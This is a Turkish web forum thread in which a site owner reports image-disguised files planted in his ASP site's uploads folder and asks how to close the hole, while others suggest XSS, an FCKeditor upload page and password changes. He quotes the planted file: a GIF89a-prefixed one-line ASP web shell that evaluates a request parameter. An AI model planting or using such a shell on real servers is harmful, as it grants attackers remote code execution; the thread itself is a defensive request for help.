-
Üyelik
30.01.2012
-
Yaş/Cinsiyet
39 / E
-
Meslek
web tasarım
-
Konum
Kahramanmaraş
-
Ad Soyad
A** A**
-
Mesajlar
142
-
Beğeniler
1 / 11
-
Ticaret
0, (%0)
merhaba arkadaşlar. sitemin birisinin ana dizinine uploads klasörü adı altında gif veya jpeg gibi gösterilmiş shell olarak tabir edilen dosyalar sokulmuş. dosyaları txt ile açtığımda fonksiyonu olmayan basit bir kodlama yazılmış.
GIF89a
<%response.write("a1"&"b2"&"c3"&"d4")&eval(request("Fex0"))%>
bu işlemi nasıl yapıyorlar. sitemin admin paneli dışında upload işlemi yapılan bir yer yok. admin kısmındaki upload alanlarınada ulaşmaları çok zor.
bu açığın nedeni nedir ve nasıl kapatabilirim. Bu arada sitem windows sunucu üzerinde asp tabanlı bir site
-
Üyelik
28.10.2016
-
Yaş/Cinsiyet
35 / E
-
Meslek
Öğretmen
-
Konum
Malatya
-
Ad Soyad
E** Ç**
-
Mesajlar
64
-
Beğeniler
7 / 6
-
Ticaret
0, (%0)
hocam pm attım, dönüş yaparmısınız?
http://yemektariflerim.biz - http://bahistahtasi.com
-
Üyelik
30.01.2012
-
Yaş/Cinsiyet
39 / E
-
Meslek
web tasarım
-
Konum
Kahramanmaraş
-
Ad Soyad
A** A**
-
Mesajlar
142
-
Beğeniler
1 / 11
-
Ticaret
0, (%0)
sitenin ziyaretçilere açık kısmında upload edilecek herhangi bir sayfa yada form yok
dump3cz
Üyeliği Durdurulmuş
Banlı Kullanıcı
-
Üyelik
01.05.2017
-
Yaş/Cinsiyet
25 / E
-
Meslek
Yazılım
-
Konum
Bilecik
-
Ad Soyad
O** Ç**
-
Mesajlar
1749
-
Beğeniler
169 / 326
-
Ticaret
3, (%67)
XSS'ye dikkat ettin xss ile upload yaratıp upload yapılabiliyor.
-
Üyelik
30.01.2012
-
Yaş/Cinsiyet
39 / E
-
Meslek
web tasarım
-
Konum
Kahramanmaraş
-
Ad Soyad
A** A**
-
Mesajlar
142
-
Beğeniler
1 / 11
-
Ticaret
0, (%0)
b açığı nasıl kapatırım. web.config dosyası ve ya başka bir fonksiyon ile. yani bunun nedeni sitedeki formlar mı nedir daha detaylı bilgi verebilecek bir arkadaş yokmu
-
Üyelik
30.01.2012
-
Yaş/Cinsiyet
39 / E
-
Meslek
web tasarım
-
Konum
Kahramanmaraş
-
Ad Soyad
A** A**
-
Mesajlar
142
-
Beğeniler
1 / 11
-
Ticaret
0, (%0)
Sql injection açıklarını kapattığımı düşünüyorum. Sitedeki tüm formlardan gelen verilerdeki zararlı karakterleri filtreleyip yasaklıyorum. Dizin görüntüleme kapalı. Sitede admin panel dışında upload yapılacak bir alan da yok. Velhasıl bir türlü çözemedim. Ama aklıma admin panelde kallanmak üzere fck editör kullanıyorum bir şekilde bu fck editör upload sayfasına erişmiş olabilir belki
utf8
WM Aracı
Kullanıcı
-
Üyelik
05.05.2014
-
Yaş/Cinsiyet
49 / E
-
Meslek
eğitim
-
Konum
Konya
-
Ad Soyad
B** Z**
-
Mesajlar
205
-
Beğeniler
25 / 21
-
Ticaret
0, (%0)
hocam aynı durumdan muzdaribim. Adamlar sızıyor programla açıkları tarıyorlar. Ben wordfence eklentisi kurdum. Panelde saldırıları firewall ile durdurmuş gibi gözüküyor fakat yinede sızıntı var. Çok acemilerin girmesi zorlaştı ama ustalar yine saldırıyor.
Tavsiyem weritabanı şifresini değiştirin. (config içinde de değişecek tabi)
wp kulanıcı şifresini özel ve uzun karakterler ile değiştirin.
Eklentilerden de saldırı olabiliyor. wp super cache şüpeli olarak görüyorum.
site içinde shell olabilir bu nedenle dosya tarihlerini kontrol edin yeni değişen dosya şüphelidir.
-
Üyelik
30.01.2012
-
Yaş/Cinsiyet
39 / E
-
Meslek
web tasarım
-
Konum
Kahramanmaraş
-
Ad Soyad
A** A**
-
Mesajlar
142
-
Beğeniler
1 / 11
-
Ticaret
0, (%0)
Hocam ben wordpress hiç kullanmadım ihtiyacım olan yazılımları kendim yapıyorum asp ile. Hertürlü saldırıya karşıda tedbirimi alıyorum. Programlarlada açıkları tarıyorum sorun görünmüyor. Ama yinede biryerlerden sunucudaki diğer siteler olabilir açık buluyorlar.